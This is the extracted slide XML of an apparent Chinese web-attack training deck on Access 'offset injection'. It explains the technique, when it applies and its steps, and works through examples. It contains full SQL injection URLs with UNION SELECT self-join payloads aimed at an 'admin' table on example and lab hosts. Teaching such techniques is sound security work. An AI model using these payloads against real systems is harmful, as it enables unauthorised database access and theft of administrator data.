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37746-D6B7-4D58-B7A5-CAA5D9BC9B7F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1CED-8654-41C1-93D6-2FE558CAD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3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1C3F-B252-404D-AFE6-389C9683773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A247-5506-4C98-A272-74559A631F3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D9E3A-3536-495B-A43E-894D65A4BF0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3AF0D-6DB6-48BD-8F80-0DAEC1DF050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A412-7BE0-466F-A8F9-7D92033E055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B47F6-F362-4E4F-B042-9D0E366A33B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64C0C-E74C-4925-999A-E7FED1CE13F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E3C1-5DE5-426D-90C4-7E92483DD48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45F8-6C9C-42A7-83FC-882F96736D8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7A3D3-D560-4019-AD80-FCC7A5D0DBC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B1B5D-E5BA-4366-A03B-4845175F989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A43D-A87C-4603-8AE5-E0AC3A88332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AC9F-1836-4398-8DBB-CAD4706C33A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EEE14-650F-4E94-A414-147C56EA224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7FC98-9D81-4AAD-8ECD-636AAB7E2D7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D659-44FC-4666-9CB1-C978CC9AB18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94C0-9B4A-4C1F-9C11-B833BA89636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E4BAF-1645-49AB-9EAB-6035F4AD548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09C29-E1F6-4C21-9A84-D8F63B52EA9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0A5E0-0977-4C61-961E-22C4547F523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F823D1-03F9-479D-922F-06C18E3C7BA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442A4B-61DF-4B23-9F6F-039F3A8A421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Access偏移注入利用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A53098B-13AE-4CC7-9754-908049B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2686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偏移注入公式实践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84836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/>
                </a:solidFill>
              </a:rPr>
              <a:t>偏移注入的基本公式为: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          order by 出的字段数减去*号的字段数，然而再用order by的字段数减去2倍刚才得出来的答案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　　　　也就是18-11=7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　　　　　　　18-7*2=4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>得到答案等于：4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655" y="3155315"/>
            <a:ext cx="10600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例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx.com/test.</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>asp?id=688 union select 1,2,3,4,a.id,b.id,* from (sys_admin as a inner join sys_admin as b on a.id = b.id)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#这里union select 1,2,3,4：顾名思义就是刚才得出来的长度。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#后面的是sql，可作公式。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http://192.168.1.110/Production/PRODUCT_DETAIL.asp?id=1513+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.1.110/Production/PRODUCT_DETAIL.asp?id=1513+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,*+from+admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>22-16 = 6 </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>22-6*2 = 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.1.110/Production/PRODUCT_DETAIL.asp?id=1513+union+select+1,2,3,4,5,6,7,8,9,10,a.id,b.id,*+from+(admin+as+a+inner+join+admin+as+b+on+a.id=b.id)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C272-9E4D-41D2-B47A-6AA41BD0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230" y="2855595"/>
            <a:ext cx="5230495" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="523049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505007" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="450500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93509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Access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偏移注入原理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64629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偏移注入利用场景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2068" y="2885758"/>
            <a:ext cx="5230495" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="52304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9350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偏移注入流程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6462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偏移注入公式实践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CC041D-05E9-4A6F-A6E6-B3F720D7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76F8A97-1B22-4280-B035-46D1D61A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51230" y="2855595"/>
            <a:ext cx="5230495" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="523049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505007" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="450500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93509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Access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偏移注入原理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64629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偏移注入利用场景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82068" y="2885758"/>
            <a:ext cx="5230495" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="52304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9350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偏移注入流程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6462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Access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偏移注入公式实践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97DD093-A684-4AA5-9E74-AF90809A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偏移注入原理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4DF8C7C-5EEF-4217-86FA-AD59BFA9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7095" y="174244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/>
                </a:solidFill>
              </a:rPr>
              <a:t>借用数据库的自连接查询让数据库内部发生乱序，从而偏移出所需要的字段在我们的页面上显示！</a:t>
            </a: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运气很重要，不能保证100%成功。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900EC4D-CEE5-4F16-AC1C-3E9FFC0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09620" y="3163570"/>
            <a:ext cx="55733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偏移注入利用场景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E775295-9C1B-4A60-B56C-F180B92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偏移注入利用场景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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>解决知道Access数据库中知道表名，但是得不到字段的sql注入困境。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5655" y="28619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字段名取名复杂，字典暴力破解字段名不成功。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8EC03-050C-4CE5-8810-5993EBD3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83685" y="3163570"/>
            <a:ext cx="40239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偏移注入流程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1DE706-7089-4C78-9A0C-D7F3B853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80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偏移注入流程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</a:rPr>
              <a:t>判断字段数   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>order by 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2、 判断表名   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>表名来获取</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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3、 开始偏移注入  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>利用注入公式来注入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88D5149-09CB-43E8-BE1D-DD2CF8D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17215" y="3081655"/>
            <a:ext cx="56819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Access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偏移注入公式实践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AC977CF-877C-42C4-A944-41D5191A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Adobe Gothic Std B</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Impact</vt:lpstr>
      <vt:lpstr>1_Office 主题</vt:lpstr>
      <vt:lpstr>2_Office 主题</vt:lpstr>
      <vt:lpstr>Web攻防 训练营</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Access偏移注入原理</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Access偏移注入利用场景</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Access偏移注入流程</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Access偏移注入公式实践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131</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-20T13:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-17T09:46:28Z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